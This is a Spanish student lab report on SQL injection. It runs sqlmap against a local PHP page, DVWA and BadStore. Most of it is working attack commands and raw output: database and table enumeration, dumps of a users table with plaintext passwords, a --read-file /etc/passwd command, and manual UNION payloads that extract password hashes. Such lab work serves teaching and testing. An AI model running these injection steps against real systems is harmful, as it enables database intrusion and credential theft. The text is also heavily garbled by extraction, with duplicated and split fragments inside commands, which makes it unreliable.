SQL Injection 2 Map
Índice 1. A)
................................................................................................ ...........................................3 ..............3 Ataque Local...................................................................
Servidor de BD y Versión ..................................................................................3
............................................................................................... ....................................5 .......5 B) Nombre de la BD.................................................................. ............................................................................................... ......................................................6 .........................6 C) Tablas:..................................................................
D)
............................................................................................. ................................................7 ...................7 Columnas:................................................................
............................................................................................8 .........................8 E) Contenido de la Tabla:................................................................... .....................................................................................9 ...................9 F) Resto de Bases de Datos: ..................................................................
G) 2.
......................................................................................... ....................... 10 Usuarios de MySQL: .................................................................. ................................................................................................ .................................................... ....................... 12 DVWA ...................................................................
Installation Installation.............................................................. .................................................................................................... ............................................................ ...................... 12
3. A)
................................................................................................ ............................................... .................. 17 BadStore ................................................................... ................................................................................ ................ 17 Servidor de BD y Versión ................................................................
............................................................................................... .................................. ..... 19 B) Nombre de la BD.................................................................. ............................................................................................ ......................................................... ............................ 20 C) Tablas...............................................................
D)
.............................................................................................. .............................................. ................. 21 Columnas .................................................................
............................................................................................ ........................................ ........... 22 E) Resto de BBDD ...............................................................
4. A)
............................................................................................. .................................................... ....................... 23 Acunetix................................................................ ................................................................................ ................ 23 Servidor de BD y Versión ................................................................
............................................................................................... .................................. ..... 25 B) Nombre de la BD.................................................................. ............................................................................................ ......................................................... ............................ 26 C) Tablas...............................................................
D)
.............................................................................................. .............................................. ................. 27 Columnas .................................................................
Iván Martín Valderas
Página 2
SQL Injection
1.Ataque 1. Ataque Local Vamos a realizar un ataque de SQL injection a nuestra página anterior con la cual hacíamos una consulta a nuestra base de datos de MySQL. Su localización es: http://localhost/ejerPHP/SQL_Injection/consulta.php Para ello utilizaremos el programa SQLMap desde la consola.
A) Servidor de BD y Versión
Primero vamos a averiguar el tipo d e servidor de Base de Datos y su versión, para ello utilizaremos la opción –b de sqlmap: C:\sqlmap-0.9\sqlmap>sqlmap.py C:\sqlmap-0.9\sqlmap>sqlm ap.py -u http://localho http://localhost/ejerPHP/SQL_Injectio st/ejerPHP/SQL_Injection/consult n/consult a.php?id=1 -b sqlmap/0.9 - automatic automatic SQL injection injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 13 :57:25 [13:57:26] [INFO] [INFO] using 'C:\sqlmap-0.9\s 'C:\sqlmap-0.9\sqlmap\ qlmap\output\ output\localhost\se localhost\session' ssion' as sessi on file [13:57:26] [INFO] testing connection to the target url [13:57:26] [INFO] testing if the url is s table, wait a few seconds [13:57:27] [INFO] url is stable [13:57:27] [INFO] testing if GET parameter 'id' is dynamic [13:57:27] [INFO] confirming that GET parameter 'id' is dynamic [13:57:27] [INFO] GET parameter 'id' is dynamic [13:57:28] [WARNING] heuristic test shows that GET parameter 'id' might not be i njectable [13:57:28] [INFO] testing sql injection injection on GET parameter parameter 'id' [13:57:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [13:57:28] [INFO] GET parameter 'id' is 'AND boolean-based blind blind - WHERE or HAVI NG clause' injectable injectable [13:57:28] [INFO] testing 'MySQL >= 5.0 AND error-based error-based - WHERE or H AVING clause ' [13:57:28] [INFO] testing 'PostgreSQL AND error-based error-based - WHERE or HAVING clause' [13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase Server/Sybase AND error-based error-based - WHERE o r HAVING clause' clause' [13:57:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [13:57:28] [INFO] testing 'MySQL > 5.0.11 stacke s tacked d queries' [13:57:28] [INFO] testing 'PostgreSQL > 8 .1 stacked queries'
[13:57:28] [INFO] [INFO] testing 'Microsoft SQL S erver/Sybase erver/Sybase stacked queries' [13:57:28] [INFO] testing 'MySQL > 5.0.11 AND time-based time-based blind' [13:57:38] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 5 .0.11 AND time-based blind' in jectable [13:57:38] [INFO] testing 'MySQL UNION query (NULL) (NULL) - 1 to 10 1 0 columns' [13:57:38] [INFO] target url appears to be UNION injectable injectable with 3 columns [13:57:38] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 colu mns' injectable GET parameter parameter 'id' is vulnerable. vulnerable. Do you y ou want to keep testing the others? [y/N] Y
sqlmap identified identified the following injection injection points with a total of 29 HTTP(s) requests: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind blind - WHERE WH ERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns columns Payload: id=-8382 UNION UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNU CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS LL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,1 CHAR),CHAR(32)),CHAR(58,108,107,98,5 08,107,98,5 8)), NULL, NULL, NULL# Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[13:57:44] [INFO] the back-end DBMS is MySQL [13:57:44] [INFO] [INFO] fetching banner web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 banner: '5.5.8' [13:57:44] [INFO] Fetched data logged to text fi les under 'C:\sqlmap-0.9\sqlmap\ 'C:\sqlmap-0.9\sqlmap\ output\localhost' [*] shutting down at: 13 :57:44 :57:44
En este paso el programa ha ido testeando cada una de las posibilidades para averiguar el tipo de servidor: […] 'MySQL > 5.0.11 'PostgreSQL > 8.1 'Microsoft SQL Server
[…] Tras realizar las operaciones, encontramos la versión: MySQL 5.0.11
Iván Martín Valderas
Página 4
SQL Injection
B) Nombre de la BD
Éste es el primer paso para sacar toda la información que podamos de nuestra víctima ya que a partir de aquí iremos pasa a paso entrando más a fondo en la BD. Sacamos el nombre de la Base B ase de Datos a la que se refiere la consulta que hemos he mos realizado, es decir la base de datos actual, con el comando: --current-db
C:\sqlmap-0.9\sqlmap>sqlmap.py C:\sqlmap-0.9\sqlmap>sqlm ap.py -u http://localho http://localhost/ejerPHP/SQL_Injectio st/ejerPHP/SQL_Injection/consult n/consult a.php?id=1 --current-db sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:01:02 [14:01:02] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:01:02] [INFO] resuming injection data from session file [14:01:02] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:01:02] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: Parameter: id id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:01:03] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:01:03] [INFO] fetching current database
current database: 'asir1' [14:01:03] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\localhost' [*] shutting down at: 14:01:03
El nombre de la Base de Datos es “asir1”
C) Tablas: Una vez obtenido el nombre de la Base de Datos, ya podemos proceder proceder a ver v er las tablas que ésta posee, mediante el comando --tables indicando –D asir1 para el nombre que hemos obtenido antes: C:\sqlmap-0.9\sqlmap>sqlmap.py C:\sqlmap-0.9\sqlmap>sqlm ap.py -u http://localho http://localhost/ejerPHP/SQL_Injectio st/ejerPHP/SQL_Injection/consult n/consult a.php?id=1 --tables -D asir1 sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:04:48 [14:04:48] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:04:48] [INFO] resuming injection data from session file [14:04:48] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:04:48] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: Parameter: id id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:04:49] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:04:49] [INFO] fetching tables for database 'asir1' [14:04:49] [INFO] the SQL query used returns 1 entries
Database: asir1 [1 table] +----------+ | usuarios | +----------+ [14:04:49] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\localhost' [*] shutting down at: 14:04:49
Obtenemos una tabla: usuarios
Iván Martín Valderas
Página 6
SQL Injection
D) Columnas: C:\sqlmap-0.9\sqlmap>sqlmap.py C:\sqlmap-0.9\sqlmap>sqlm ap.py -u http://localho http://localhost/ejerPHP/SQL_Injectio st/ejerPHP/SQL_Injection/consult n/consult a.php?id=1 --columns -T usuarios -D asir1 sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:06:30 [14:06:30] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:06:30] [INFO] resuming injection data from session file [14:06:30] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:06:30] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: Parameter: id id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:06:31] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:06:31] [INFO] fetching columns for table 'usuarios' on database ' asir1' [14:06:31] [INFO] the SQL query used returns 3 entries
Database: asir1 Table: usuarios [3 columns] +--------------+-------------------------+ | Column | Type | +--------------+-------------------------+ | id | int(10 int(10)) unsigned | | nonmbr nonmbre e | varcha varchar(50) r(50) | | password | varcha varchar(50) r(50) | +----------+-----------------------------+ [14:06:31] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\localhost' [*] shutting down at: 14:06:31
Hemos obtenido los nombres de las columnas y su tipo
E) Contenido de la Tabla:
C:\sqlmap-0.9\sqlmap>sqlm C:\sqlmap-0.9\sqlma p>sqlmap.py ap.py -u http://localho http://localhost/ejerPHP/SQL_Injectio st/ejerPHP/SQL_Injection/consult n/consult a.php?id=1 --dump -T usuarios -D asir1 sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:07:28 [14:07:28] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:07:28] [INFO] resuming injection data from session file [14:07:28] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:07:28] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: Parameter: id id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:07:28] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:07:29] [INFO] fetching columns for table 'usuarios' on database 'asir1' [14:07:29] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\localhost\session' : id, int(10) unsigned, nonmbre, varchar(50), password, varchar(50) [14:07:29] [INFO] fetching entries for table ' usuarios' on database 'asir1' [14:07:29] [INFO] the SQL query used returns 3 entries
Database: asir1 Table: usuarios [3 entries] +----+---------+----------+ | id | nonmbre | password | +----+---------+----------+ | 2 | ivan | ivanasir | | 3 | luci | luciasir | | 1 | root | asir2 asir2012 012 | +----+---------+----------+
Ahora ya tenemos nuestra tabla usuarios de la Base de Datos asir1 completa Iván Martín Valderas
Página 8
SQL Injection
F) Resto de Bases de Datos:
C:\sqlmap-0.9\sqlmap>sqlmap.py C:\sqlmap-0.9\sqlmap>sqlm ap.py -u http://localho http://localhost/ejerPHP/SQL_Injectio st/ejerPHP/SQL_Injection/consult n/consult a.php?id=1 --dbs sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:08:22 [14:08:22] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:08:22] [INFO] resuming injection data from session file [14:08:22] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:08:22] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: Parameter: id id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:08:22] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:08:22] [INFO] fetching database names [14:08:22] [INFO] the SQL query used returns 8 entries
available databases [8]: [*] asir1 [*] cdcol [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test [*] webauth
G) Usuarios de MySQL:
C:\sqlmap-0.9\sqlmap>sqlmap.py C:\sqlmap-0.9\sqlmap>sqlm ap.py -u http://localho http://localhost/ejerPHP/SQL_Injectio st/ejerPHP/SQL_Injection/consult n/consult a.php?id=1 --users sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:10:03 [14:10:03] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:10:03] [INFO] resuming injection data from session file [14:10:03] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:10:03] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: Parameter: id id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:10:03] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:10:03] [INFO] fetching database users [14:10:03] [INFO] the SQL query used returns 58 entries
database management system users [4]: [*] ''@'localhost' [*] 'pma'@'localhost' [*] 'root'@'127.0.0.1' [*] 'root'@'localhost'
Iván Martín Valderas
Página 10
SQL Injection
Sólo existe un usuario root. Aquí está uno de los problemas. prob lemas. Estamos utilizando el usuario root que trae por defecto MySQL para acceder por PHP. Si estamos utilizando el usuario root para nuestras sentencias de SQL eso quiere decir que podemos hacer llamadas al sistema:
Así podríamos saber las contraseñas usadas, por ejemplo en UNIX: C:\sqlmap-0.9\sqlmap>sqlm C:\sqlmap-0.9\sqlma p>sqlmap.py ap.py -u http://localho http://localhost/ejerPHP/SQL_Injectio st/ejerPHP/SQL_Injection/consult n/consult a.php?id=1 --read-file /etc/passwd
2.DVWA 2. DVWA Damn Vulnerable Web App [[La carpeta debe estar en htdocs]]
Installation Default username = admin Default password = password
Para accede, debemos escribir en nuestro explorador: http://127.0.0.1/dvwa/
Creamos la Base de Datos
Iván Martín Valderas
Página 12
SQL Injection
Comprobamos Comprobamos la existencia de la vulnerabilidad:
1' or '1'='1' union select password, first_name from users where first_name='admin
ID: 1' or '1'='1' union select password, password, first_name from users where first_name='admin First
name:
5f4dcc3b5aa765d61d8327deb882cf99
Surname: admin
http://es.scribd.com/doc/48652427/Practica-SQL-Injection-en-DVWA
Iván Martín Valderas
Página 14
SQL Injection
Hemos obtenido una contraseña, aunque como vemos está codificada, c odificada, vamos a utilizar una utilidad web para decodificarla:
Probamos a sacar todas las contraseñas a la vez, ya que con el anterior código deberíamos hacerlo 1 a 1:
1' or '1'='1' union select first_name, first_name, password from users where '1'='1
Iván Martín Valderas
Página 16
SQL Injection
3. BadStore Si en el campo search escribimos una comilla doble (“) nos encontramos con una r espuesta del servidor SQL, por lo que podemos prever la vulneravilidad SQL
Al igual que con la primera práctica, práctic a, vamos a seguir los pasos
A) Servidor de BD y Versión
C:\sqlmap-0.9\sqlmap>sqlm C:\sqlmap-0.9\sqlma p>sqlmap.py ap.py -u "http://192.168.13.164/cgi-bin/bads "http://192.168.13.164/cgi-bin/badstore.cgi?se tore.cgi?se archquery=hi&action=search&x= archquery=h i&action=search&x=0&y=0" 0&y=0" -b
sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:02:41 [10:02:41] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:02:41] [INFO] testing connection to the target url [10:02:41] [INFO] testing if the url is stable, wait a few seconds [10:02:42] [INFO] url is stable [10:02:42] [INFO] testing if GET parameter 'searchquery' is dynamic [10:02:43] [WARNING] GET parameter 'searchquery' is not dynamic [10:02:43] [INFO] heuristic test shows that GET parameter 'searchquery' might be injectable (possible DBMS: MySQL) [10:02:43] [INFO] testing sql injection on GET parameter 'searchquery' [10:02:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:02:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:02:45] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:02:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' parsed error message(s) showed that the back-end DBMS could be MySQL. Do you wan t to skip test payloads specific for other DBMSes? [Y/n] y [10:02:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:02:57] [INFO] target url appears to be UNION injectable with 4 columns [10:02:57] [INFO] GET parameter 'searchquery' is 'MySQL UNION query (NULL) - 1 t o 10 columns' injectable GET parameter 'searchquery' is vulnerable. Do you want t o keep testing the ot her s? [y/N] y Aquí nos ha avisado de que el parámetro ‘searchquery’ ‘searchquery’ es vulnerable, es decir, la caja de búsqueda donde antes insertamo insertamoss las comillas dobles (“) posee un GET que nos permitirá insertar ahí sentencias SQL, nos pregunta además si queremos buscar otros parámet parámetros ros vulnerables.
[10:03:05] [INFO] testing if GET parameter 'action' is dynamic [10:03:05] [INFO] confirming that GET parameter 'action' is dynamic [10:03:05] [INFO] GET parameter 'action' is dynamic [10:03:05] [WARNING] heuristic test shows that GET parameter 'action' might not be injectable [10:03:05] [INFO] testing sql injection on GET parameter 'action' [10:03:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:03:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:03:07] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:03:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:03:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:03:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [10:03:17] [WARNING] GET parameter 'action' is not injectable [10:03:17] [INFO] testing if GET parameter 'x' is dynamic [10:03:17] [WARNING] GET parameter 'x' is not dynamic [10:03:17] [WARNING] heuristic test shows that GET parameter 'x' might not be in jectable [10:03:17] [INFO] testing sql injection on GET parameter 'x' [10:03:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:03:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:03:19] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:03:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:03:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:03:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [10:03:31] [WARNING] GET parameter 'x' is not injectable [10:03:31] [INFO] testing if GET parameter 'y' is dynamic [10:03:31] [WARNING] GET parameter 'y' is not dynamic [10:03:31] [WARNING] heuristic test shows that GET parameter 'y' might not be in jectable [10:03:31] [INFO] testing sql injection on GET parameter 'y' [10:03:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:03:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:03:33] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:03:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:03:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:03:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [10:03:44] [WARNING] GET parameter 'y' is not injectable sqlmap identified the following injection points with a total of 380 HTTP(s) req uests: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0
Iván Martín Valderas
Página 18
SQL Injection --[10:03:45] [INFO] testing MySQL [10:03:45] [INFO] confirming MySQL [10:03:45] [INFO] the back-end DBMS is MySQL [10:03:45] [INFO] fetching banner web application technology: Apache 1.3.28
back-end DBMS: MySQL < 5.0.0 banner: '4.1.7-standard' [10:03:45] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164' [*] shutting down at: 10:03:45
B) Nombre de la BD C:\sqlmap-0.9\sqlmap>sqlmap.py C:\sqlmap-0.9\sqlmap>sqlm ap.py -u "http://192.168.13.164/cgi-bin/bads "http://192.168.13.164/cgi-bin/badstore.cgi?se tore.cgi?se archquery=hi&action=search&x= archquery=h i&action=search&x=0&y=0" 0&y=0" --current-db sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:12:35 [10:12:35] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:12:35] [INFO] resuming injection data from session file [10:12:35] [INFO] resuming back-end DBMS 'mysql 4' from session file [10:12:35] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0 --[10:12:35] [INFO] the back-end DBMS is MySQL web application technology: Apache 1.3.28 back-end DBMS: MySQL 4 [10:12:35] [INFO] fetching current database
current database: 'badsto 'badstoredb' redb' [10:12:36] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164' [*] shutting down at: 10:12:36
El nombre de la BD es badstoredb
C) Tablas C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/ba C:\sqlmap-0.9\sqlmap>sqlmap.py "http://192.168.13.164/cgi-bin/badstore.cgi?se dstore.cgi?se archquery=hi&action=search&x=0&y=0" archquery=h i&action=search&x=0&y=0" --tables -D badstoredb sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:20:13 [10:20:13] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:20:13] [INFO] resuming injection data from session file [10:20:13] [INFO] resuming back-end DBMS 'mysql 4' from session file [10:20:13] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0 --[10:20:14] [INFO] the back-end DBMS is MySQL web application technology: Apache 1.3.28 back-end DBMS: MySQL 4 [10:20:14] [ERROR] information_schema not available, back-end DBMS is MySQL < 5. 0 do you want to use common table existance check? [Y/n/q] y [10:20:21] [INFO] checking table existence using items from 'C:\sqlmap-0.9\sqlma p\txt\common-tables.txt' [10:20:21] [INFO] adding words used on web page to the check list please enter number of threads? [Enter for 1 (current)] [10:20:28] [WARNING] running in a single-thread mode. This could take a while. [10:27:14] [INFO] retrieved: itemdb
Database: badstoredb [1 table] +--------+ | itemdb | +--------+ [10:27:14] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164' [*] shutting down at: 10:27:14
El nombre de la tabla es itemdb
Iván Martín Valderas
Página 20
SQL Injection
D) Columnas C:\sqlmap-0.9\sqlmap>sqlmap.py C:\sqlmap-0.9\sqlmap>sqlm ap.py -u "http://192.168.13.164/cgi-bin/bads "http://192.168.13.164/cgi-bin/badstore.cgi?se tore.cgi?se archquery=hi&action=search&x= archquery=h i&action=search&x=0&y=0" 0&y=0" --columns -T itemdb -D badsto badstoredb redb sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:29:00 [10:29:00] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:29:00] [INFO] resuming injection data from session file [10:29:00] [INFO] resuming back-end DBMS 'mysql 4' from session file [10:29:00] [INFO] resuming brute forced table name 'itemdb' from session file [10:29:00] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0 --[10:29:00] [INFO] the back-end DBMS is MySQL web application technology: Apache 1.3.28 back-end DBMS: MySQL 4 [10:29:00] [ERROR] information_schema not available, back-end DBMS is MySQL < 5. 0 do you want to use common columns existance check? [Y/n/q] y [10:29:03] [INFO] checking column existence using items from 'C:\sqlmap-0.9\sqlm ap\txt\common-columns.txt' please enter number of threads? [Enter for 1 (current)] [10:29:05] [WARNING] running in a single-thread mode. This could take a while. [10:29:36] [INFO] retrieved: price [10:29:55] [INFO] retrieved: qty
Database: badstoredb Table: itemdb [2 columns] +--------+---------+ | Column | Type | +--------+---------+ | price price | numeric numeric | | qty | numeric | +--------+---------+ [10:34:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164'
[*] shutting down at: 10:34:18
E) Resto de BBDD Como podemos haber visto, visto, no hay ninguna tabla llamada usuarios ni nada por el estilo, sólo se encuentra la tabla de los productos por lo que de esta manera no podemos sacar ni usuarios ni contraseñas, vamos a comprobar entonces otras bases de datos:
